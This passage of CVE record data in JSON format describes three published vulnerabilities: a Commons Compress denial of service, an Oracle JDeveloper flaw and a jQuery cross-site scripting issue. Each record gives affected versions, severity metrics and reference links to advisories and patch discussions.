{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T23:17:39.992Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "[creadur-commits] 20191022 [creadur-rat] branch master updated: RAT-258: Update to latest commons-compress to fix CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { name: "FEDORA-2019-c96a8d12b0", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { name: "FEDORA-2019-da0eac1eb6", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] nielsbasjes opened a new pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] 
flinkbot commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200310 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 
[GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL closed pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 Re: CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ 
"mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[brooklyn-dev] 20200403 [GitHub] [brooklyn-server] nakomis opened a new pull request #1089: Bumps commons-compress version", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_transferred", ], url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Commons Compress", vendor: "Apache Software Foundation", versions: [ { status: "affected", version: "1.15 to 1.18", }, ], }, ], descriptions: [ { lang: "en", value: "The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. 
This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.", }, ], problemTypes: [ { descriptions: [ { description: "denial of service vulnerability", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2023-08-18T13:06:40.207792", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { name: "[creadur-commits] 20191022 [creadur-rat] branch master updated: RAT-258: Update to latest commons-compress to fix CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { name: "FEDORA-2019-c96a8d12b0", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { name: "FEDORA-2019-da0eac1eb6", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] nielsbasjes opened a new pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: 
"https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200310 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: 
"https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL closed pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 Re: 
CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[brooklyn-dev] 20200403 [GitHub] [brooklyn-server] nakomis opened a new pull request #1089: Bumps commons-compress version", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, ], }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2019-12402", datePublished: "2019-08-29T00:00:00", dateReserved: "2019-05-28T00:00:00", dateUpdated: "2024-08-04T23:17:39.992Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2016-3504
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html | x_refsource_CONFIRM |
| http://www.securityfocus.com/bid/91787 | vdb-entry, x_refsource_BID |
| http://www.securitytracker.com/id/1036370 | vdb-entry, x_refsource_SECTRACK |
| http://www.securityfocus.com/bid/92023 | vdb-entry, x_refsource_BID |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T23:56:14.101Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { name: "91787", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/91787", }, { name: "1036370", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1036370", }, { name: "92023", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/92023", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2016-3504", options: [ { Exploitation: "none", }, { Automatable: "yes", }, { "Technical Impact": "total", }, ], role: "CISA Coordinator", timestamp: "2024-10-11T20:26:03.921963Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-11T20:52:29.504Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2016-07-19T00:00:00", descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-08-31T09:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { 
name: "91787", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/91787", }, { name: "1036370", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1036370", }, { name: "92023", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/92023", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2016-3504", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { name: "91787", refsource: "BID", url: "http://www.securityfocus.com/bid/91787", }, { name: "1036370", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1036370", }, { name: "92023", refsource: "BID", url: "http://www.securityfocus.com/bid/92023", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2016-3504", datePublished: "2016-07-21T10:00:00", dateReserved: "2016-03-17T00:00:00", dateUpdated: "2024-10-11T20:52:29.504Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2020-11022
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T11:21:14.453Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "DSA-4693", tags: [ "vendor-advisory", "x_transferred", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { name: "FEDORA-2020-11be4b36d4", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { name: "FEDORA-2020-36d2db5f51", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_transferred", ], url: "https://jquery.com/upgrade-guide/3.5/", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { tags: [ "x_transferred", ], url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { tags: [ "x_transferred", ], url: "https://www.drupal.org/sa-core-2020-002", }, { name: "openSUSE-SU-2020:1060", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { name: "GLSA-202007-03", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202007-03", }, { name: "openSUSE-SU-2020:1106", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { name: "[airflow-commits] 20200820 [GitHub] [airflow] breser opened a new issue #10429: jquery dependency needs 
to be updated to 3.5.0 or newer", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { name: "FEDORA-2020-fbb94073a1", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { name: "FEDORA-2020-0b32a59b54", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { name: "FEDORA-2020-fe94df8c34", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "[flink-issues] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-dev] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { name: "openSUSE-SU-2020:1888", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { name: "[flink-issues] 20201129 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: 
"https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2020-11", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2020-10", }, { name: "[flink-issues] 20210209 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210209 [jira] [Comment Edited] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { name: "[debian-lts-announce] 20210326 [SECURITY] [DLA 2608-1] jquery security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { name: "[flink-issues] 20210422 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210422 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ 
"mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2021-10", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2021-02", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "[flink-issues] 20211031 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "jQuery", vendor: "jquery", versions: [ { status: 
"affected", version: ">= 1.2, < 3.5.0", }, ], }, ], descriptions: [ { lang: "en", value: "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.9, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2023-08-31T02:06:33.630688", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { name: "DSA-4693", tags: [ "vendor-advisory", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { name: "FEDORA-2020-11be4b36d4", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { name: "FEDORA-2020-36d2db5f51", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { url: "https://jquery.com/upgrade-guide/3.5/", }, { url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { url: 
